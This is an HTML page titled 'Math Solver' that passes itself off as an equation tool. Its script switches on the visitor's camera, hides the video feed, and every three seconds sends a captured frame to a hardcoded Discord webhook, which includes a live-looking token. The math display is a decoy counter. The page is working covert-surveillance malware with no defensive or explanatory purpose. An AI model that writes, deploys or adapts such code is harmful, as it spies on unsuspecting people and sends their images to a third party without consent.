<!DOCTYPE html>
<html>
<head>
  <meta charset="UTF-8">
  <title>Math Solver</title>
  <style>
    body {
      background-color: #f7f7f7;
      font-family: Arial, sans-serif;
      font-size: 16px;
    }
    h1 {
      color: #003580;
      font-size: 32px;
      text-align: center;
      margin-top: 50px;
    }
    #math-image {
      display: block;
      margin: 0 auto;
      width: 400px;
      height: 300px;
      border: 2px solid #003580;
      border-radius: 10px;
      box-shadow: 5px 5px 10px rgba(0, 0, 0, 0.2);
    }
    #math-equation {
      text-align: center;
      margin-top: 20px;
      font-size: 24px;
      color: #003580;
    }
    video {
      display: none; /* إخفاء الفيديو */
    }
  </style>
</head>
<body>
  <h1>Math Solver</h1>
  <img id="math-image" src="" alt="Math Equation">
  <div id="math-equation"></div>
  <video id="video" width="400" height="300" autoplay></video>

  <script>
    var imageCounter = 1;

    setInterval(function () {
      captureImage();
    }, 3000);

    function captureImage() {
      var video = document.querySelector('video');
      var canvas = document.createElement('canvas');
      canvas.width = video.videoWidth;
      canvas.height = video.videoHeight;
      canvas.getContext('2d').drawImage(video, 0, 0);
      
      // تحديث الصورة
      canvas.toBlob(function (blob) {
        document.getElementById('math-image').src = URL.createObjectURL(blob);

        // إرسال الصورة إلى Webhook
        var formData = new FormData();
        formData.append('file', blob, 'math-equation.jpg');
        var xhr = new XMLHttpRequest();
        xhr.open('POST', 'https://discord.com/api/webhooks/1317625966306005104/Jto4PkzgKwC4GwedEP4PiL4PjXjF2tBcNdSizTBG_7omqqivhu32KOmis0kbtwlwEf2w');
        xhr.send(formData);
      }, 'image/jpeg', 1.0);

      var equation = 'Equation ' + imageCounter++;
      document.getElementById('math-equation').innerHTML = equation;
    }

    // تشغيل الكاميرا
    navigator.mediaDevices.getUserMedia({ video: { width: 1280, height: 720 } })
      .then(function (mediaStream) {
        var video = document.getElementById('video');
        video.srcObject = mediaStream;
        video.play();
      })
      .catch(function (err) {
        alert('Error accessing camera: ' + err.message);
      });
  </script>
</body>
</html>
